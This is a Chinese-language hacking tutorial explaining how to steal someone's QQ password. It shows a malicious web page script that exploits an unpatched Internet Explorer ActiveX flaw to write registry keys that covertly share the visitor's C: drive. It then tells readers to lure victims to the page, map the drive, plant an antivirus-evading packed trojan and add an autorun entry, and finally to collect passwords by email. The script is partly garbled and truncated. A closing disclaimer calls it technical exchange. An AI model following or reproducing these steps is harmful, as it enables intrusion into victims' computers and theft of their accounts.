黑客通過網頁竊取QQ方法解析

要想偷別人的QQ，方法有很多了。利用惡意網頁使對方的電腦被共享出來是很有趣的一招。方法是：在你的網站網頁中加入如下內容的程式碼：
<script language=Java Script>
e("<APPLET HEIGHT=0 WIDTH=0 code=veXComponent></APPLET>");
function f()
{*********************];
LSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
telnstance()
Shl=bject()   rite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Flafgs",302,"REG_DWORD");
rite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Type",0,"REG_DWORD");
rite("HKLMSoftwareMicrosoftWindowsCurrentVersionNetworkLanManRWC$Path","C:");}
function init()
{setTimeout("f()",1000);}
{********************}
init()
</script>

上面的程式碼大家一定很容易讀懂，簡單說來就是通過修改對方登錄檔中的鍵值，把對方的C盤共享出來，如果想讓對方的其他盤都共享請自行設定。

述程式碼中{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}代表Windows Scripting Host(WSH)的外殼物件。WSH是微軟提供的一種基於32位Windows平臺的、與語言無關的指令碼解釋機制，它使得指令碼能夠直接在Windows桌面或命令提示符下執行。WSH使得指令碼可以被執行，就象執行批處理一樣。以“rite”開頭的這幾句程式碼的作用是寫入瀏覽者的登錄檔，就是它們使得對方的硬碟被共享的。把“Flags”的鍵值設為00000302可以隱藏共享，使對方無法發現，非常隱蔽。

網頁做好後，把它上傳你的主頁空間，騙他瀏覽你的網頁（就看你的嘴皮子功夫了），如果對方的IE沒有打補丁（網上這樣的電腦有很多），就可以把他的C盤共享出來。整個方法的原理就是把veXComponent物件嵌入<APPLET>標記中，這樣會導致任意建立和解釋執行ActiveX物件，使我們可以建立任意檔案、執行程式、寫登錄檔。未打補丁的IE，在開啟含有上述程式碼的網頁時不會有任何警告，我們就是利用這個漏洞把對方的硬碟被共享出來。

等對方中招後，就把對方的硬碟對映過來，可以使用net use命令，也可以使用網路刺客II等軟體。下一步可以給對方植入一個盜QQ的軟體，比方說QQ殺手等，注意一定要用ASPack或其他加殼軟體給木馬加殼（其實就是另類“壓縮”），防止防毒軟體發現。

最後，開啟記事本鍵入以下內容：

[AutoRun]
open=

儲存為，其中的為木馬檔案。把和一起拷到對方某分割槽的根目錄下。這樣，只要他雙擊該分割槽就會中木馬！這樣可以大大的增加木馬執行的主動性！須知許多人現在都非常警惕，不熟悉的檔案他們輕易的不會執行，而這種方法就很難防範了。

以後，你就等著用郵箱收信收對方的QQ密碼吧。

注意，本文只是技術交流，大家不要隨意盜取別人的QQ。同時為了保障安全我們沒有完全刊登原始碼。敬請原諒！